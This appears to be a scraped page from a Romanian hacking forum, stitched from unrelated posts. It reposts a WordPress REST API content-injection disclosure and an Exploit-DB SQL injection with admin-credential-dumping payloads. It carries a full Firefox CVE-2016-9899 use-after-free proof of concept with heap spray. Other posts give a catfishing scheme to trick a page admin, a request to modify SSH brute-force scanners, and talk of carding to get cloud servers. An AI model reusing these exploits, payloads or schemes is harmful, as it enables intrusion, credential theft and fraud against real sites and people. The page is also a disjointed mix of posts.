Leaderboard

Nu vezi ba boule ca am scris mai sus? E impotriva regulilor. Am spus-o pentru a te mai gandi odata. Ban permanent, labagiule.

Stiti ca e impotriva regulilor, da ?

Cu ce crezi ca ne-ar ajuta ceva gratuit?

Security Risk: Severe Exploitation Level: Easy/Remote DREAD Score: 9/10 Vulnerability: Privilege Escalation / Content Injection Patched Version: 4.7.2 As part of a vulnerability research project for our Sucuri Firewall (WAF), we have been auditing multiple open source projects looking for security issues. While working on WordPress, we discovered a severe content injection (privilege escalation) vulnerability affecting the REST API. This vulnerability allows an unauthenticated user to modify the content of any post or page within a WordPress site. We disclosed the vulnerability to the WordPress Security Team who handled it extremely well. They worked closely with us to coordinate the disclosure timeline and get as many hosts and security providers aware and patched before this became public. A fix for this was silently included on version 4.7.2 along with other less severe issues. This was done intentionally to give everyone time to patch. We are now disclosing the details because we feel there has been enough time for most WordPress users to update their sites. Are You At Risk? This privilege escalation vulnerability affects the WordPress REST API that was recently added and enabled by default on WordPress 4.7.0. One of these REST endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site. The REST API is enabled by default on all sites using WordPress 4.7.0 or 4.7.1. If your website is on these versions of WordPress then it is currently vulnerable to this bug. Technical Details Our journey begins in ./wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php There are a couple of things to notice here. The registered route is designed to populate the ID request parameter with digits. For example, if you are sending a request to /wp-json/wp/v2/posts/1234 – the ID parameter would be set to 1234. This behavior alone could be a good way to prevent attackers from crafting malicious ID values, but when looking at how the REST API manages access, we quickly discover that it prioritizes $_GET and $_POST values over the ones generated by the route’s regular expression. This makes it possible for an attacker to send a request like: /wp-json/wp/v2/posts/1234?id=12345helloworld – which would assign 12345helloworld to the ID parameter – which now contains more than just digits. Investigating further, we had a look at the various callbacks (in the screenshot above) and one of them kept our attention: the update_item and its permission check method update_item_permissions_check. In short, it passes our alphanumeric ID value directly to the get_post() function. This function validates the request by checking if the post actually exists and whether our user has permission to edit this post. We found this to be a curious way of sanitizing the request. If we send an ID that doesn’t have a corresponding post, we can just pass through the permission check and be allowed to continue executing requests to the update_item method! Curious about what could cause get_post() to fail at finding a post (other than a non-existent ID), we realized it used the get_instance() static method in wp_posts to grab posts. As you can see from the code, it would basically fail on any input that isn’t all made of numeric characters – so 123ABC would fail. For an attacker, this means that WordPress (thinking it’s a user with enough privilege to edit this post) would run the update_item method. We thought it would make sense to check what this method does. There is a very subtle, yet important detail in that last screenshot – WordPress casts the ID parameter to an integer before passing it to get_post! This is an issue because of the way PHP does type comparisons and conversions. For example, one can see that the following snippet would return 123: This leads to a very dangerous situation where an attacker could submit a request like /wp-json/wp/v2/posts/123?id=456ABC to change the post whose ID is 456! Due to this type-juggling issue, it is then possible for an attacker to change the content of any post or page on a victim’s site. From there, they can add plugin-specific shortcodes to exploit vulnerabilities (that would otherwise be restricted to contributor roles), infect the site content with an SEO spam campaign, or inject ads, etc. Depending on the plugins enabled on the site, even PHP code could be executed very easily. SOURCE: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

https://aws.amazon.com/free/ - Amazon EC2 750 h/luna gratuite Da-mi un pm cu modificarile pe care vrei sa le faci si un link de pe care sa descarc programele.

Il prinzi in capcana pe admin. Îți faci un cont de fata, dar sa para cat mai real o bunaciune, apoi ii dai like la o grămadă de poștari apoi ii trimiți mesaj ca ce mult îți place pagina lui apoi ii mai dai niste like-uri apoi ii trimiți mesaj ca îți place pagina foarte mult si ai vrea admin/editor etc ca vrei sa il ajuți cu pagina. El îți da admin si tu atunci o sa vezi cine e.... Am obosit

# # # # # # Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection # Google Dork: N/A # Date: 07.02.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 # Demo: http://demos.nelliwinne.net/MySqlFileUpload/ # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title # Etc....Other files have vulnerabilities ... # # # # # Sursa: https://www.exploit-db.com/exploits/41267/.

Foloseste: Nu trebuia sa ne precizezi ca esti un golan, mi s-au ridicat flocii dupa spate, tristut. In primul rand cu golaneala nu faci nimic, nu stiu cum merge pe la voi p'acolo cred ca aelius stie (parca p'acolo sta), ia du-te la scoala baga-te pe un profil de mate-info/cursuri cum au aia pe acolo, invata si fa proiectele pe care profesorii te pun sa le faci, altfel vei sterge si tu curu' la ceva german imputit ( asta daca esti copil, ceea ce cred ca esti ). Iar daca nu esti copil si legat de povestirea ta ca tu lucri acolo, poi incepem iarasi de la precizarea ca esti un golan si daca ai fost golan si in tinerete si nu ti-ai folosit capul cam greu il poti porni sa mai inveti ceva in domeniul asta, nu zic ca nu se poate, dar trebuie chef si vointa, ma puteti injura n-am bai ). Eu unu ma rog pentru tine sa nu ne fi mintit in legatura cu varsta ta, mai exista o sansa sa iti faci un viitor "misto", succes.

<!DOCTYPE html> <html> <head> <!-- <meta http-equiv="refresh" content="1"/> --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="Expires" content="0" /> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" /> <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" /> <meta http-equiv="Pragma" content="no-cache" /> <style type="text/css"> body{ background-color:lime; font-color:red; }; </style> <script type='text/javascript'></script> <script type="text/javascript" language="JavaScript"> /* * Mozilla Firefox < 50.1.0 Use-After-Free POC * Author: Marcin Ressel * Date: 13.01.2017 * Vendor Homepage: www.mozilla.org * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/ * Version: < 50.1.0 * Tested on: Windows 7 (x64) Firefox 32 && 64 bit * CVE: CVE-2016-9899 ************************************************* * (b1c.5e0): Access violation - code c0000005 (first chance) * First chance exceptions are reported before any exception handling. * This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580 * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0 nv up ei pl nz na pe nc * cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 * xul!mozilla::net::LoadInfo::AddRef+0x3dd41: * 6d7cc44c ff12 call dword ptr [edx] ds:002b:4543484f=???????? * 0:000> dd eax * 0f804c00 4543484f 91919191 91919191 91919191 * 0f804c10 91919191 91919191 91919191 91919191 * 0f804c20 91919191 91919191 91919191 91919191 * 0f804c30 91919191 91919191 91919191 91919191 * 0f804c40 91919191 91919191 91919191 91919191 * 0f804c50 91919191 91919191 91919191 91919191 * 0f804c60 91919191 91919191 91919191 91919191 * 0f804c70 91919191 91919191 91919191 91919191 * */ var doc = null; var cnt = 0; function m(blocks,size) { var arr = []; for(var i=0;i<blocks;i++) { arr[i] = new Array(size); for(var j=0;j<size;j+=2) { arr[i][j] = 0x41414141; arr[i][j+1] = 0x42424242; } } return arr; } function handler() { //free if(cnt > 0) return; doc.body.appendChild(document.createElement("audio")).remove(); m(1024,1024); ++cnt; } function trigger() { if(cnt > 0) { var pl = new Array(); doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false); for(var i=0;i<4096;i++) { //replace pl[i]=new Uint8Array(1000); pl[i][0] = 0x4F; pl[i][1] = 0x48; pl[i][2] = 0x43; pl[i][3] = 0x45; //eip for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91; // pl[i] = document.createElement('media'); //document.body.appendChild(pl[i]); } window.pl = pl document.getElementById("t1").remove(); //re-use } } function testcase() { var df = m(4096,1000); document.body.setAttribute('df',df); doc = document.getElementById("t1").contentWindow.document; doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false); doc.getElementsByTagName("*")[0].style = "ANNNY"; setInterval("trigger();",1000); } </script> <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title> </head> <body onload='testcase();'> <iframe src='about:blank' id='t1' width="100%"></iframe> </body> </html> Sursa: https://www.exploit-db.com/exploits/41042/

Il gasesti gratuit pe net... daca ma incordez il pun eu, dar mi-e lene sa il caut sa vad unde l-am downloadat.

Frate root-ul de amazon nu este gratis decat daca cardezi Nu stiu.. dau si eu ce mai am

Stiti acel pscan2 si sshd de la bruteforce? Arhiva de scan mai precis mix.. Poate cineva sa-si faca timp si sa ma ajute sa le modific? Dau un vps de la amazon celui care ma poate ajuta..